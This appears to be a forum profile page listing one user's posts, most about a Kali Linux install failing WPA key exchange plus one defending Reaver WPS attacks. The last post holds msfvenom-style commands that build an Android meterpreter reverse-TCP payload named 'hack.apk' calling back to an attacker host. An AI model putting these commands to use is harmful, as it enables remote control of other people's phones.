Jump to content

Kalikid

Active Members
  • Posts

    9
  • Joined

  • Last visited

Everything posted by Kalikid

  1. Yeah I probably could have used better terminology when describing the situation, but at the time I couldnt think of a better way to explain. sorry for the confusion. and as for an update on the issue. i re-downloaded the current iso from kali.org, the direct download not the torrent, wrote it to usb. and im still having the same problem so, since im not to comfortable editing config files, as im not a programmer or a computer professional im downloading an older version of the OS , 1.0.7 to be specific, and we'll see if it has the same problem, I dont think i will, as prior to 1.0.9 I never had this issue, and if it works. ill just upgrade from there.
  2. Yeah it works no problem off the live usb. connectivity is not an issue
  3. Im trying to install kali on an empty partition on my hard drive. This problem doesnt make any since to me. I just tried it with a different AP, that im literally 5 feet from, correct password. same issue. failed to exchange key with AP. im thinking maybe there was a problem writing the kali iso to the usb. I've never had this problem before and there doesnt seem to be an easy solution. Im going to re-download the iso and re-write the image to the usb and see if i have the same problem.
  4. To be completely honest and show my ignorance, I dont know what wpa supplicant is, Im attempting to connect during the install process,(which is required to complete the installation) regular install not graphical so i guess its a gui, but not much of one. very basic
  5. First off im no pro, not a programmer, or a computer science major, just a computer security enthusiast. so heres my two cents feel free to disregard it IMO: If the AP is vulnerable to WPS attacks and your close enough Reaver works fine, and is quite a bit simpler than aircrack, and in ideal conditions a WPS attack is almost certain to be successful, whereas your dictionary bruteforce attack may never find the proper password for the AP, if its not in your dictionary list your SOL, and with WPS pins i think it something like 11,000 possible combinations? So my answer IS NO its not dead. Its effective for the right target. Although you might not find a lot of AP vulnerable to this atack if you do come across one, and lets say have permission to perform this action its a good choice. Not to mention I love how once you start an attack you can stop it, leave go home come back the next day, and resume right where you left off.
  6. So I've been Having some trouble installing the newest version of kali linux: kali-linux-1.0.9a-i386 or the amd64 version My host OS is ubuntu and im trying to install it on a secondary partition[to dual boot] But every time I get to network configuration, It gives me an error message that says Key exchange failure check the wpa/wpa2 parameters you provided. Im not sure why im getting this error the password i provided is correct, and when i tried installing it in a VM it had no problem with network configuration. Ive had no problems with this before, but it doesn’t seem to make any since to me. I could be standing a foot from the router and it will still give me the same error. whats going on here??
  7. Thanks give me a second to do my reading!
  8. Hello, First off I would like to say hi hak5 forums, love the show and couldnt register with kali's forum so i came here because I would like to educate myself, or be educated by others on some aspects of metasploit/kali To put it in the simplest terms, I was creating a payload for android, and I was wondering, how do i know what LPORT to use. for my first try i tried 446 with the following command : msfconsole android/meterpreter/reverse_tcp LHOST=<my.ip.adress> LPORT=446 R > hack.apk and it returned an error that i cant specify exactly(because i dont remember) but to paraphrase it was something along the lines of : invalid LPORT option than i switched it too msfconsole android/meterpreter/reverse_tcp LHOST=<my.ip.adress> LPORT=443 R > hack.apk and for some reason that i cant understand port 443 worked. so back to my question.... How do i know what LPORT to use when creating a payload? msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection> - See more at: http://www.hacking-tutorial.com/hacking-tutorial/hacking-android-smartphone-tutorial-using-metasploit/#sthash.sDSTQbRg.dpuf msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection> - See more at: http://www.hacking-tutorial.com/hacking-tutorial/hacking-android-smartphone-tutorial-using-metasploit/#sthash.sDSTQbRg.dpuf
×
×
  • Create New...